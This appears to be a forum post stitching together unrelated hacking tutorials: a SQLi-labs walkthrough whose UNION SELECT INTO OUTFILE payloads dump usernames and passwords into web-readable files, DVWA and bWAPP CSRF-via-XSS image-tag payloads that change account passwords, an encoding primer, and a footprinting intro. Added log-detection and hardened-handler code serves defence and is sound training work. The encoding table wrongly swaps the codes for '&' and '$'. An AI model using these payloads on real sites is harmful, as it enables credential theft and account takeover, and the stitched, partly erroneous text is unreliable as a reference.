05-02-2020, 12:00 PM
This statement allows the user to dump table data very rapidly to a text file on the server machine. SELECT … INTO OUTFILE writes the selected rows to a file and allows column and row terminators to be used to specify the output format. The output file is created directly by the MySQL server, so the filename with path must name the location where the user wants the file to be written on the server host. The file must not already exist on the server; it cannot be overwritten. A user requires the FILE privilege to run this statement.
Let’s start!!
Lesson 7
Open the browser and enter the following URL:
http://localhost:81/sqli/Less-7/?id=1
From the screenshot, you can read “you are in….. Use outfile”. Now let’s try to break this statement.
![[Image: 1.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-p0h3DpQ_LJI/WVEtf1t1IHI/AAAAAAAAQSg/lP63kI1Hg902-n-8OKQPH_vabc4gMcAzwCLcBGAs/s1600/1.png?w=687&ssl=1)
OKAY! The query has been broken successfully: we receive an error message when we use a single quote (‘) to break the query, which confirms that it is vulnerable.
http://localhost:81/sqli/Less-7/?id=1'
![[Image: 2.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-TZ2tmI9dEBU/WVEtgnZ_aHI/AAAAAAAAQSw/Wy_RoHQ8cJYNLcNq8uxSiOErhjZD6e82gCLcBGAs/s1600/2.png?w=687&ssl=1)
After some effort the query is finally fixed. Note that the steps for SQL injection are the same as in the previous chapter; only the technique for fixing the query is different.
http://localhost:81/sqli/Less-7/?id=1')) --+
![[Image: 3.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-LmIShhCFnuA/WVEthfTlFqI/AAAAAAAAQS0/Ticprp8Q9j0-3rZxIqY02sRGClQJ1o0mgCEwYBhgL/s1600/3.png?w=687&ssl=1)
Now the following query will dump the result into a text file. Here you need to specify the path where you want the file to be written on the server host. The file must not already exist on the server, so always use a new text file when writing out database information.
http://localhost:81/sqli/Less-7/?id=1')) union select 1,2,3 into outfile "/xampp/htdocs/sqli/Less-7/hack1.txt" --+
From the screenshot, you can see that it is still showing an error message. Now open another tab to view the output of the resulting query.
![[Image: 4.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-CcEZ87Gp0Ck/WVEthctCD4I/AAAAAAAAQS4/qEKCsbWO_oMuP53V52awqUz_zImgVtXhgCEwYBhgL/s1600/4.png?w=687&ssl=1)
http://localhost:81/sqli/Less-7/
Now add file name hack1.txt to check the output of the above query.
![[Image: 5.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-N7PJkgXAbNA/WVEthrSwhmI/AAAAAAAAQS8/D67LsWak_RArtAYUBVoqR-LMw8q5OQuxACEwYBhgL/s1600/5.png?w=687&ssl=1)
http://localhost:81/sqli/Less-7/hack1.txt
Hence you can see we get the output of the executed query inside a text file. The hack1.txt file is also saved on the server machine.
![[Image: 6.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-C1I_MlSTUSQ/WVEth_OqvsI/AAAAAAAAQTA/bc9zfpUZH0Em8TNRdhOVM9l_RpRjiTZSACEwYBhgL/s1600/6.png?w=687&ssl=1)
Execute the following query to retrieve the database name using union injection, writing the output to a new text file.
http://localhost:81/sqli/Less-7/?id=1')) union select 1,2,database() into outfile "/xampp/htdocs/sqli/Less-7/hack2.txt" --+
![[Image: 7.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-tEc3sC4clTM/WVEtiMpiB0I/AAAAAAAAQTE/CWZuR7GvL8MzjFozpIxmK-bEXNAMAEA8wCEwYBhgL/s1600/7.png?w=687&ssl=1)
http://localhost:81/sqli/Less-7/hack2.txt
Hence you can see we have successfully retrieved “security” as the database name.
![[Image: 8.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-PCnpGUKhf_w/WVEtiJn0SII/AAAAAAAAQTI/w31TkRDa7TcP-BPgJQ90Pw_ZoZwlvLfVwCEwYBhgL/s1600/8.png?w=687&ssl=1)
The next query will provide all the table names saved inside the database, using another text file.
http://localhost:81/sqli/Less-7/?id=1')) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() into outfile "/xampp/htdocs/sqli/Less-7/hack3.txt" --+
![[Image: 9.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-eqBwTEwYsuA/WVEtihWh0uI/AAAAAAAAQTM/Q7KVn9Cv0OYE3n-xVRtj3X2cwD4idXOtQCEwYBhgL/s1600/9.png?w=687&ssl=1)
http://localhost:81/sqli/Less-7/hack3.txt
From the screenshot you can read the following table names:
T1: emails
T2: referers
T3: uagents
T4: users
![[Image: 10.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-5oQtqDvmk-U/WVEwAEIBwNI/AAAAAAAAQTQ/4UTbN21D5Dw_vS4y32DubbctLhiyHzc_wCLcBGAs/s1600/10.png?w=687&ssl=1)
Now we’ll try to find out column names of users table using the following query.
localhost:81/sqli/Less-7/?id=1')) union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' into outfile "/xampp/htdocs/sqli/Less-7/hack4.txt" --+
![[Image: 11.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-NwxpZkJnvXQ/WVEwNRCt6hI/AAAAAAAAQTc/PwoHsg8xwksn8KTdJxJIpoXDmL6MJT8igCLcBGAs/s1600/11.png?w=687&ssl=1)
http://localhost:81/sqli/Less-7/hack4.txt
Hence you can see it contains many columns; I had chosen only two columns for further enumeration.
C1: username
C2: password
![[Image: 12.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-wBYFFl9S0XI/WVEwNKGJa6I/AAAAAAAAQTU/XWkcbUUwrPIb-Lu41PeephGJdJhzSBh9QCEwYBhgL/s1600/12.png?w=687&ssl=1)
At last, execute the following query to read all usernames and passwords from the users table.
http://localhost:81/sqli/Less-7/?id=1')) union select 1,group_concat(username),group_concat(password)from users into outfile "/xampp/htdocs/sqli/Less-7/hack5.txt" --+
![[Image: 13.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-YLgMfrCiVqQ/WVEwNZV-sQI/AAAAAAAAQTY/NNJxRRm4a2MMiuoIJvYjh_whIad_Hh73wCEwYBhgL/s1600/13.png?w=687&ssl=1)
http://localhost:81/sqli/Less-7/hack5.txt
From the screenshot, you can read the usernames and passwords saved inside the text file.
Note: you can try the same attack using an Excel file; the attacker only needs to change hack1.txt to hack1.csv, which will save the output into an Excel-readable file.
![[Image: 14.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-xrOQSysWg9E/WVEwNisACwI/AAAAAAAAQTg/uH3OOwYtIaAa_ephnj9Hc0YjUIa0o70WwCEwYBhgL/s1600/14.png?w=687&ssl=1)
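From the defender's side, the payloads used in this lesson leave a recognisable trail in the web server's access log: a UNION SELECT with INTO OUTFILE naming a path under the document root, followed by a request for the file that was just dropped. The following detector is an added example, not part of the original tutorial; the log lines are constructed in the XAMPP/Apache style, and the document root `/xampp/htdocs` is assumed from the paths used above.

```python
"""Added example: flag UNION ... INTO OUTFILE payloads in web access logs and
correlate them with later reads of the dropped file. Log lines are constructed."""
import re
from urllib.parse import unquote_plus, urlsplit

# Assumption for this example: the web root MySQL is writing into (XAMPP default on the page).
DOCROOT = "/xampp/htdocs"

# Constructed sample lines in Apache combined-log style (not real traffic).
SAMPLE_LOG = r"""
127.0.0.1 - - [05/Feb/2020:12:00:01 +0000] "GET /sqli/Less-7/?id=1 HTTP/1.1" 200 512
127.0.0.1 - - [05/Feb/2020:12:00:03 +0000] "GET /sqli/Less-7/?id=1%27%29%29%20union%20select%201,2,3%20--+ HTTP/1.1" 200 498
127.0.0.1 - - [05/Feb/2020:12:00:05 +0000] "GET /sqli/Less-7/?id=1%27%29%29%20union%20select%201,2,3%20into%20outfile%20%22/xampp/htdocs/sqli/Less-7/hack1.txt%22%20--+ HTTP/1.1" 200 498
127.0.0.1 - - [05/Feb/2020:12:00:09 +0000] "GET /sqli/Less-7/?id=1'))%20union%20select%201,group_concat(username),group_concat(password)from%20users%20into%20outfile%20%22/xampp/htdocs/sqli/Less-7/hack5.txt%22%20--+ HTTP/1.1" 200 498
127.0.0.1 - - [05/Feb/2020:12:00:12 +0000] "GET /sqli/Less-7/hack5.txt HTTP/1.1" 200 77
"""

REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
UNION_RE = re.compile(r"union\s+(?:all\s+|distinct\s+)?select\b")
OUTFILE_RE = re.compile(r"into\s+(?:out|dump)file\s+['\"](?P<path>[^'\"]+)['\"]")


def normalize(target: str) -> str:
    """Percent-decode twice (catches double encoding), squash whitespace, lowercase."""
    decoded = unquote_plus(unquote_plus(target))
    return re.sub(r"\s+", " ", decoded).lower()


def scan_log(text: str):
    """Return [(line_no, verdict, detail)] for suspicious requests.

    Verdicts: 'union-select'      a UNION SELECT injected into the query string
              'outfile-write'     SELECT ... INTO OUTFILE/DUMPFILE naming a server path
              'dropped-file-read' a later request for a path an OUTFILE payload tried to create
    """
    findings = []
    dropped = set()  # web paths (lowercased) that OUTFILE payloads attempted to create
    for n, line in enumerate(text.strip().splitlines(), 1):
        m = REQ_RE.search(line)
        if not m:
            continue
        target = m.group("target")
        path = urlsplit(target).path
        if path.lower() in dropped:
            findings.append((n, "dropped-file-read", path))
            continue
        norm = normalize(target)
        out = OUTFILE_RE.search(norm)
        if out:
            fs_path = out.group("path")
            if fs_path.startswith(DOCROOT.lower()):
                dropped.add(fs_path[len(DOCROOT):])  # map filesystem path to web path
            findings.append((n, "outfile-write", fs_path))
        elif UNION_RE.search(norm):
            findings.append((n, "union-select", path))
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(*finding)
```

The write itself only succeeds when the application's MySQL account holds the FILE privilege and `secure_file_priv` permits the target directory, so a web application account should have neither; the log correlation above catches the attempt either way.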
Hello friends! In our earlier article, we saw how an attacker can attack a web application’s CSRF vulnerability with the help of Burp Suite. Today we are again going to test a CSRF attack, this time with the help of an XSS vulnerability. As we know, with the help of XSS an attacker might be able to read cookies from the same domain, and if the CSRF token is stored in cookies then the attacker will be able to read the CSRF token from a CSRF-protected post. Let’s have a look at how an attacker can carry out a CSRF attack to change the password of the admin account when the web application suffers from a cross-site scripting vulnerability. For this tutorial, I had used DVWA and set its security level to low.
![[Image: 1.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-6pZp91qy8hw/WU5HNl4NL3I/AAAAAAAAQRs/Fiha-99JDegC0EoOKfhYpd9qBaQv8bQWQCLcBGAs/s1600/1.png?w=687&ssl=1)
Suppose that you have found an XSS vulnerability in a web application. Here we are going to use a JavaScript or HTML payload that carries out a CSRF attack to change the password of the admin account.
![[Image: 2.1.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-vRsnHfgyyvY/WU5HNk3jPYI/AAAAAAAAQRo/fLsCr0CUyOY9AVwDWB0hlaw_I4G8pVESACLcBGAs/s1600/2.1.png?w=687&ssl=1)
An XSS attack can be used to read the cookies and obtain the valid token, if it is stored in cookies, which then has to be inserted in the malicious script to make CSRF possible. Using an image tag we will send a malicious script; inside the script I had set a new password of 123456.
<img src="/dvwa/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change">
![[Image: 2.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-lmfD-NNwByo/WU5HN8swOrI/AAAAAAAAQRw/JA5K82EDRTMT1VsVqT7eetdZTQjEOhvVQCEwYBhgL/s1600/2.png?w=687&ssl=1)
Now let’s check whether the password for admin has been changed or not. Previously the credentials were admin: password; if the admin fails to log in to the web server using the previous credentials, then we have successfully made the CSRF attack.
From the given screenshot, you can see that using admin: password confirms the login failed. Now use the new password 123456 to log in to the web server.
![[Image: 3.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-_fYseFY9_As/WU5HOYTJGqI/AAAAAAAAQR0/a6wPxcMY1Fwxbq6iBLUFai6dOCLBEIhyACEwYBhgL/s1600/3.png?w=687&ssl=1)
Similarly, there is another web application, bWAPP, where we will demonstrate the same attack using an XSS vulnerability. First, you need to choose the bug “cross-site scripting Reflected (post)” and set the security level to low.
![[Image: 4.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-e95uLi2m7g4/WU5HO3TaC9I/AAAAAAAAQR8/ozvELZq6VpcvDZl_ewEY_sQuXPLI-93MgCEwYBhgL/s1600/4.png?w=687&ssl=1)
In the given screenshot the form suffers from an XSS vulnerability; now we are going to generate a script to make CSRF possible in order to change the password for a user. Here we are logged in to the web server as bee: bug, and we will try to change its password with the help of cross-site scripting.
![[Image: 5.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-LwUBz7EY6yQ/WU5HO1hqR1I/AAAAAAAAQR4/1ovGVvzBxHUjU6EaopxIsFXe9tEECfZcwCEwYBhgL/s1600/5.png?w=687&ssl=1)
Similarly, using an image tag we will send a malicious script; inside the script I had set the new password as hack.
<img src="/bwapp/csrf_1.php?password_new=hack&password_conf=hack&action=change">
![[Image: 7.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-HcG3zbMEk54/WU5HPsf6FOI/AAAAAAAAQSM/IMbs-EnwyiA-Cb-nserWrm-g3u__fPEZgCEwYBhgL/s1600/7.png?w=687&ssl=1)
From the screenshot, you can see the generated image icon, which means this form has an XSS flaw. Now let’s check whether the password has been modified or not for user bee.
![[Image: 8.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-kkaE8_iQb58/WU5HQHTuFhI/AAAAAAAAQSM/byIEdgMgS54hmiodqor-HOXs9B_8-Q9xwCEwYBhgL/s1600/8.png?w=687&ssl=1)
Now use the previous credentials bee: bug; if login fails, it means we have successfully carried out the CSRF attack, and from the screenshot you can see the “invalid credential or user not activated” message. Now use the new password to log in to the web server.
Conclusion: wherever an XSS vulnerability exists in the same domain it can lead to a CSRF attack and allow attackers to remotely control the target’s browser with full rights, rendering CSRF protections useless.
![[Image: 9.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-OrqwzmArH5U/WU5HQ21RvkI/AAAAAAAAQSM/MbDaPnNfvggAshOhwrMq7wZ8pfOQvWNzACEwYBhgL/s1600/9.png?w=687&ssl=1)
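The image-tag payload works because the password-change endpoint accepts a plain GET with no token check, and a token kept in a script-readable cookie would not help against XSS anyway. The handler pair below is an added example, not DVWA's or bWAPP's code: the weak version mirrors the behaviour exploited above, the hardened one keeps the token in the server-side session only, requires POST, compares in constant time and rotates the token after use. Request and session objects are plain dicts, and the cookie name `session` is an assumption.

```python
"""Added example: weak vs. hardened password-change handler for the CSRF-via-XSS case."""
import hmac
import secrets


def weak_change_password(request: dict, user: dict):
    """The vulnerable pattern behind the <img> payload: a plain GET with matching
    password fields changes the password, with no token and no method check."""
    q = request.get("query", {})
    if "Change" in q and q.get("password_new") and q.get("password_new") == q.get("password_conf"):
        user["password"] = q["password_new"]
        return 200, "Password Changed."
    return 200, "Passwords did not match."


def issue_csrf_token(session: dict) -> str:
    """Keep the token only in the server-side session; a script-readable cookie
    would hand it to any XSS payload running on the same domain."""
    session["csrf_token"] = secrets.token_hex(32)
    return session["csrf_token"]


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie value for the session id (cookie name 'session' is assumed):
    HttpOnly keeps it away from document.cookie, SameSite limits cross-site sends."""
    return f"session={session_id}; Path=/; HttpOnly; Secure; SameSite=Lax"


def hardened_change_password(request: dict, session: dict, user: dict):
    """Require POST, a token matching the session copy, matching passwords; then rotate."""
    if request.get("method") != "POST":
        return 405, "State changes require POST."
    form = request.get("form", {})
    expected = session.get("csrf_token") or ""
    supplied = form.get("user_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return 403, "CSRF token is incorrect."
    new, conf = form.get("password_new", ""), form.get("password_conf", "")
    if not new or new != conf:
        return 400, "Passwords did not match."
    user["password"] = new      # a real application stores a password hash
    issue_csrf_token(session)   # one-time use: a captured token cannot be replayed
    return 200, "Password Changed."


# Constructed request matching the <img src="...?password_new=123456&..."> payload above.
FORGED_GET = {"method": "GET",
              "query": {"password_new": "123456", "password_conf": "123456", "Change": "Change"}}


def demo():
    """Run both handlers against the forged GET; returns (weak_pw, hardened_status, hardened_pw)."""
    weak_user = {"password": "password"}
    weak_change_password(FORGED_GET, weak_user)
    hard_user, session = {"password": "password"}, {}
    issue_csrf_token(session)
    status, _ = hardened_change_password(FORGED_GET, session, hard_user)
    return weak_user["password"], status, hard_user["password"]


def hardened_flow():
    """Statuses for: wrong token, password mismatch, valid change, replay of the used token."""
    user, session = {"password": "password"}, {}
    tok = issue_csrf_token(session)
    post = lambda token, new, conf: {"method": "POST", "form": {
        "user_token": token, "password_new": new, "password_conf": conf}}
    return (hardened_change_password(post("bad", "x", "x"), session, user)[0],
            hardened_change_password(post(tok, "x", "y"), session, user)[0],
            hardened_change_password(post(tok, "x", "x"), session, user)[0],
            hardened_change_password(post(tok, "z", "z"), session, user)[0])


if __name__ == "__main__":
    print(demo())            # ('123456', 405, 'password')
    print(hardened_flow())   # (403, 400, 200, 403)
```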
From Wikipedia
This article will describe the different types of processes involved in encoding data.
The term encoded data means wrapped data; the process of encoding transforms the data into a different format so that it can be easily understood by different types of systems. For example, ASCII characters are encoded by means of numbers: ‘A’ is represented by 65, ‘B’ by 66, and so on.
As we know, computers do not understand human languages, so we need to encode data into binary, which is easily read by computer systems; hence encoding is very important. It uses schemes that are widely available so that the encoding can simply be reversed. Encoding means data transformation, not data encryption; consequently it does not need a key for decoding.
URL Encoded
The internet only accepts URLs in ASCII format, so URL encoding entails encoding certain characters of the URL character set. The process takes one character and converts it into a character triplet: a “%” prefix followed by two hexadecimal digits.
| Character | Encoded |
|---|---|
| : | %3A |
| / | %2F |
| # | %23 |
| ? | %3F |
| & | %24 |
| @ | %40 |
| % | %25 |
| + | %2B |
| (space) | %20 |
| ; | %3B |
| = | %3D |
| $ | %26 |
| , | %2C |
| < | %3C |
| > | %3E |
| ^ | %5E |
| ` | %60 |
| \ | %5C |
| [ | %5B |
| ] | %5D |
| { | %7B |
| } | %7D |
| \| | %7C |
| " | %22 |
Example:
Original URL: http://www.hackingarticles.in
Encoded URL: http%3A%2F%2Fwww.hackingarticles.in
Hexadecimal
Hexadecimal or Base 16 is a positional number system which consists of 16 distinct symbols: the numerals 0 to 9 and the letters A to F (upper or lower case), which represent the numeric values 10 to 15.
Step 1 – get the decimal value of a letter; this differs between upper and lower case, e.g. A = 65 and a = 97. To find the value of any letter, count forward from “A” or “a”; the values run in single-digit succession, e.g. A = 65, B = 66, C = 67 and so on / a = 97, b = 98, c = 99 and so on.
Step 2 – to convert from decimal to hexadecimal, divide the decimal value by 16; the hex value is written as the quotient followed by the remainder. So the hex value of 97 is 61.
Eg: 16 goes into 97 six times with remainder 1, so 97 in hex is 61.

| Source | Decimal value | Hexadecimal value |
|---|---|---|
| R | 82 | 52 |
| a | 97 | 61 |
| j | 106 | 6a |
Base64
Each Base64 digit represents exactly 6 bits of data. It is a radix-64 representation of an ASCII string; here is how we get it.
Step 1 – get the decimal value of a letter; this differs between upper and lower case, e.g. A = 65 and a = 97. To find the value of any letter, count forward from “A” or “a”; the values run in single-digit succession, e.g. A = 65, B = 66, C = 67 and so on / a = 97, b = 98, c = 99 and so on.
Step 2 – divide the decimal value by 2; wherever there is a remainder it is written as “1” and wherever the remainder is 0 it is written as “0”. Continue dividing until you reach 1 and cannot divide any further. The binary value is the 1’s and 0’s read from last to first.
Eg: the decimal value of “a” is 97:

| Divisor | Value | Remainder |
|---|---|---|
| 2 | 97 | 1 |
| 2 | 48 | 0 |
| 2 | 24 | 0 |
| 2 | 12 | 0 |
| 2 | 6 | 0 |
| 2 | 3 | 1 |
|  | 1 | 1 |

Reading the remainders from last to first gives 1100001. In order to get an 8-bit value we prefix a “0” to the value, eg: 01100001, and this gives us the binary value of “a”.
Step 3 – Write the values of all the characters in binary and make groups of 6 (6-bit), eg: binary value of “Raj” in 8-bit = 01010010 01100001 01101010, binary value of “Raj” in 6-bit = 010100 100110 000101 101010.
Step 4 – Write the decimal value of each 6-bit group from Step 3 by adding the place values (32, 16, 8, 4, 2, 1) of the positions that hold a 1.
| 32 | 16 | 8 | 4 | 2 | 1 | Value |
|---|---|---|---|---|---|---|
| 0 | 1 | 0 | 1 | 0 | 0 | 20 |
| 1 | 0 | 0 | 1 | 1 | 0 | 38 |
| 0 | 0 | 0 | 1 | 0 | 1 | 5 |
| 1 | 0 | 1 | 0 | 1 | 0 | 42 |
Step 5 – Use the Base64 table to lookup the values we get in Step 4.
The Base64 index table:

| Value | Char | Value | Char | Value | Char | Value | Char |
|---|---|---|---|---|---|---|---|
| 0 | A | 16 | Q | 32 | g | 48 | w |
| 1 | B | 17 | R | 33 | h | 49 | x |
| 2 | C | 18 | S | 34 | i | 50 | y |
| 3 | D | 19 | T | 35 | j | 51 | z |
| 4 | E | 20 | U | 36 | k | 52 | 0 |
| 5 | F | 21 | V | 37 | l | 53 | 1 |
| 6 | G | 22 | W | 38 | m | 54 | 2 |
| 7 | H | 23 | X | 39 | n | 55 | 3 |
| 8 | I | 24 | Y | 40 | o | 56 | 4 |
| 9 | J | 25 | Z | 41 | p | 57 | 5 |
| 10 | K | 26 | a | 42 | q | 58 | 6 |
| 11 | L | 27 | b | 43 | r | 59 | 7 |
| 12 | M | 28 | c | 44 | s | 60 | 8 |
| 13 | N | 29 | d | 45 | t | 61 | 9 |
| 14 | O | 30 | e | 46 | u | 62 | + |
| 15 | P | 31 | f | 47 | v | 63 | / |
The Base64 encoded value of Raj is UmFq. Encoded in ASCII, the characters R, a, and j are stored as the decimal values 82, 97, and 106; their 8-bit binary values are 01010010, 01100001, and 01101010. These three values are joined together into a 24-bit string, producing 010100100110000101101010. Groups of 6 bits are converted into individual numbers from left to right. While converting from 8-bit to 6-bit, 0’s are added to fill the last slots, so that a full group of 6 can be made.
The full conversion of “Raj” to Base64 is shown in Table 1.1, and the individual conversions of “R” and “Ra” of “Raj” are shown in Tables 1.2 and 1.3 to give a breakdown of the process with explanation.

| Source | Decimal | Binary |
|---|---|---|
| R | 82 | 01010010 |
| a | 97 | 01100001 |
| j | 106 | 01101010 |
![[Image: 1.png?resize=687%2C265&ssl=1]](https://i1.wp.com/www.hackingarticles.in/wp-content/uploads/2017/06/1.png?resize=687%2C265&ssl=1)
Table 1.1. In Table 1.2, for the character “R” of “Raj”, the values in the Bit pattern section are in 8-bit format and are converted into 6-bit; the decimal values of the 6-bit groups are in the Index section.
The same process is repeated in Table 1.3 for characters “R” and “a” of “Raj”.
For each pair of extra 0’s that are added to complete a group of 6, an “=” is added, so the ASCII value of “0 0” is “=”.
![[Image: 2.png?resize=516%2C530&ssl=1]](https://i1.wp.com/www.hackingarticles.in/wp-content/uploads/2017/06/2.png?resize=516%2C530&ssl=1)
In Table 1.4, to build further on the logic used in Tables 1.2 and 1.3, “Raaj” is converted to “UmFhag==” in Base64; with the addition of another “a”, the complexity of the conversion increases. In the Index section we can see the addition of 33, 26 and 32 due to the change in the bit pattern.
For each pair of extra 0’s that are added to complete a group of 6, an “=” is added, so the ASCII value of “0 0” is “=”, as done in Tables 1.2 and 1.3.
![[Image: 3.png?resize=614%2C530&ssl=1]](https://i1.wp.com/www.hackingarticles.in/wp-content/uploads/2017/06/3.png?resize=614%2C530&ssl=1)
Rot13
This is a letter substitution cipher; its conversion process from plain text to cipher text divides the alphabet in half: A to M and N to Z. The first half mirrors the second half and vice versa, so A = N and N = A.
Eg: Rot13 of Raj = Enw
| A | B | C | D | E | F | G | H | I | J | K | L | M |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| N | O | P | Q | R | S | T | U | V | W | X | Y | Z |
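The four schemes above (percent-encoding, hexadecimal, Base64 and Rot13) implemented by hand, following the article's step-by-step Base64 method (8-bit values joined, 6-bit groups, index table, "=" padding) so the intermediate indices for “Raj” and “Raaj” can be inspected. This is an added example, not code from the original article; percent-encoding computes each triplet from the character's ASCII code, which is how the entries in the table above can be checked.

```python
"""Added example: the article's encodings worked by hand, with the stdlib as a cross-check."""
import base64
import string

B64_TABLE = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"
URL_RESERVED = set(':/#?&@%+ ;=$,<>^`\\[]{}|"')   # the characters listed in the URL table


def percent_encode(text: str) -> str:
    """Replace each reserved character with '%' plus its two-digit hex ASCII code."""
    return "".join(f"%{ord(c):02X}" if c in URL_RESERVED else c for c in text)


def to_hex(text: str) -> str:
    """Hexadecimal Step 1-2: ASCII code, divided by 16, written quotient then remainder."""
    return "".join(f"{q:x}{r:x}" for q, r in (divmod(ord(c), 16) for c in text))


def base64_indices(text: str) -> list:
    """Base64 Steps 1-4: 8-bit values joined, padded with 0s to a multiple of 6, read in 6-bit groups."""
    bits = "".join(f"{b:08b}" for b in text.encode("ascii"))
    bits += "0" * (-len(bits) % 6)
    return [int(bits[i:i + 6], 2) for i in range(0, len(bits), 6)]


def base64_encode(text: str) -> str:
    """Step 5: table lookup, then one '=' for each byte short of a full 3-byte group."""
    chars = "".join(B64_TABLE[i] for i in base64_indices(text))
    return chars + "=" * (-len(text) % 3)


def matches_stdlib(text: str) -> bool:
    """Cross-check the hand-rolled encoder against base64.b64encode."""
    return base64_encode(text) == base64.b64encode(text.encode("ascii")).decode()


def rot13(text: str) -> str:
    """Mirror the two halves of the alphabet: A<->N ... M<->Z; other characters pass through."""
    out = []
    for c in text:
        if c.isascii() and c.isalpha():
            base = ord("A") if c.isupper() else ord("a")
            out.append(chr(base + (ord(c) - base + 13) % 26))
        else:
            out.append(c)
    return "".join(out)


if __name__ == "__main__":
    print(percent_encode("http://www.hackingarticles.in"))  # http%3A%2F%2Fwww.hackingarticles.in
    print(to_hex("Raj"))                                      # 52616a
    print(base64_indices("Raj"), base64_encode("Raj"))       # [20, 38, 5, 42] UmFq
    print(base64_indices("Raaj"), base64_encode("Raaj"))     # [20, 38, 5, 33, 26, 32] UmFhag==
    print(rot13("Raj"))                                       # Enw
```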
There are many sayings about knowing your enemy, and time and again these sayings have proved true. Today we hear all around about the work of hackers, and many times we fail to protect ourselves. This happens because we are not familiar with their working process. Therefore, in this article, we are here to acquaint you with the first step of that process, i.e. footprinting.
In the world of cyber security, footprinting is the first step, which lets penetration testers gather information about a target’s hardware or network. It is basically an exploration process which helps us to know our enemy. In order to complete the penetration testing process, one ought to gather as much information as possible. Footprinting can be done either actively or passively. Assessing a company’s website with their permission is an illustration of passive footprinting, and trying to access sensitive information through social engineering is an illustration of active information gathering.
Types of Footprinting:
- Footprinting through Search Engine
- Footprinting through social engineering
- Footprinting through Social Networking sites
- Website Footprinting
- Competitive Intelligence
- WHOIS Footprinting
- Footprinting using advanced Google hacking techniques
- Email Footprinting
- DNS Footprinting
- Network Footprinting
Footprinting through Search Engine
Footprinting through a search engine is self-explanatory. People often wonder what one can find through a search engine, as the common view of a search engine is basic exploring. But the results given by a search engine can be used to a hacker’s advantage, as they are vast in nature.
Attackers use search engines to gather information about their target, such as technology platforms, employee details, login pages, intranet portals, etc., which helps in performing social engineering and/or other types of advanced system attacks.
Even search engine cache and internet archives may provide sensitive information that has been removed from the World Wide Web (WWW).
There are many search engines where you can find anything you desire, from the meaning of a word to a particular person.
Now let’s take the example of google.com. If I search “Raj Chandel” on Google, then it will give me every possible result associated with the said person.
![[Image: 1.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-aM1ZWnSBe3c/WXD0gWvUROI/AAAAAAAAQjA/DhFRlznz3ps876AJW3nqIFqv1nIB4VrbgCLcBGAs/s1600/1.png?w=687&ssl=1)
The result will be the same from other search engines. But different search engines are often used for particular searches. As shown above, Google is good for general information. If you want to know which websites are hosted on a particular server, then you can use the Bing search engine. To find the IP address of any website, just ping the website as shown below:
![[Image: 2.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-SCbOVs5N_g8/WXD0gihtAGI/AAAAAAAAQjE/pYWKuOSXkzII6uYMP59WXYs-iQQx1czwwCLcBGAs/s1600/2.png?w=687&ssl=1)
Now, open bing.com and type the IP in the search tab and press enter.
![[Image: 3.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-UPxZJwlzIAE/WXD0hJiuA-I/AAAAAAAAQjI/KSSz00Ek35IlG68Wacvo7lJCB-XxrrHWwCLcBGAs/s1600/3.png?w=687&ssl=1)
So, like this, Bing can give you details about websites which are hosted on the same server.
![[Image: 4.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-1IpXlQBb9Eo/WXD0hd3d4II/AAAAAAAAQjM/O_H8SpuoglwaIaNNFjZb-WUBoOrb_M43wCLcBGAs/s1600/4.png?w=687&ssl=1)
Another search engine is shodan.io; it helps to locate open ports, vulnerable IPs, and affected devices all over the world. Open shodan.io in your browser and search for a port or IP.
![[Image: 5.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-HbL3N6Bol_8/WXD0hnZxxNI/AAAAAAAAQjQ/a9-EMILcjwU8CefFmQxl9bP0neiC1T1vQCLcBGAs/s1600/5.png?w=687&ssl=1)
A detailed tutorial on shodan.io is covered in a separate article.
Footprinting through Jobs Seeking Sites
Similarly, you can collect an abundance of information through job sites: a company’s infrastructure details, employee profiles, hardware information and software information.
Footprinting through Alerts
There is also a feature for adding alerts. This feature gives you an alert if anything changes on a particular website, provided you have added an alert for the said website. To do so, open google.com/alerts and type the name of the website that you want to be alerted about, then click on “Create alert”.
![[Image: 6.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-dWhtdYTL70c/WXD0hyvMXpI/AAAAAAAAQjU/ySHyOkBDmhQ19GS5lrTfpCA-UURiVgeawCLcBGAs/s1600/6.png?w=687&ssl=1)
And this way an alert will be created.
